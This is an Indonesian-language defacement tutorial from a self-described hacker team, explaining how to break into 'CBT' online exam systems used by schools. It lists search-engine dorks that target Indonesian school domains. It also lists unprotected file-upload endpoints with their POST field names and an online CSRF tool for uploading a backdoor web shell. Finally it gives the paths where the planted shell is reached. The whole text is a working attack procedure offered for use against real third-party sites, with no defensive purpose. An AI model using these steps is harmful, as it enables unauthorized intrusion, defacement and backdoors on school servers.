Cara deface poc CBT

Assalamualaikum Wr.wb

Hallo Exploiter..

Perkenal kan saya ./M15T4K3
dari tim QUIXOTICXPLOIT di sini saya akan
Share tutorial cara deface Proff CBT

Oke.. langsung ke tutorial nya

 CBT Vulnerability Upload Shell With Csrf

Bahan-bahan yang diperlukan :
- Hp / Pc
- Internet/Kuota Yang cukup(buat dorking nya:v)
- Shell Backdoor atau Mini Shell
- Script Heker Kalian
- Dork
- Csrf Online ( https://earthseed.space/csrf.php ) *Csrf yang sering saya pakai

Dork :
- inurl:/panel/pages/login.php site:.sch.id
- inurl:/login.php intitle:ujian online
- inurl:/login.php intitle:ujian sma
- inurl:/login.php intitle:ujian smp
- inurl:/login.php intitle:cbt beesmart

Exploit :
/panel/pages/upload-file.php
Postfile:  uploadfile
/panel/pales/upload_jawab7.php
Postfile:  uploadfile7
/panel/pages/upload_gambar.php
Postfile:  uploadfile
/panel/pages/upload-logo.php
Postfile: uploadfile

Oke,. Lanjut

1. Kalian bisa pakai dork yang tadi saya siapkan atau dork hasil racikan kalian sendiri

Pilih target web yang menurut kalian vuln

Jika tampilan Blank atau seperti ss disini berarti tanda nya Vuln(bisa dikentot :v)

2. Kalo sudah kita copy link target(beserta Exploit) Dan letakkan pada Csrf Online

Untuk Postfile tergantung Exploit yang kita pakai tadi ya..

3. Kalo sudah Upload Shell kalian akan ada muncul Kata ( success ) pada halaman

Setelah itu silahkan akses shell kalian seperti dibawah ini :

/images/namashell.php
Atau bisa juga
/pictures/namashell.php


Dan boom! Terupload :V

Sekian tutorial dari saya
#Salam blekhet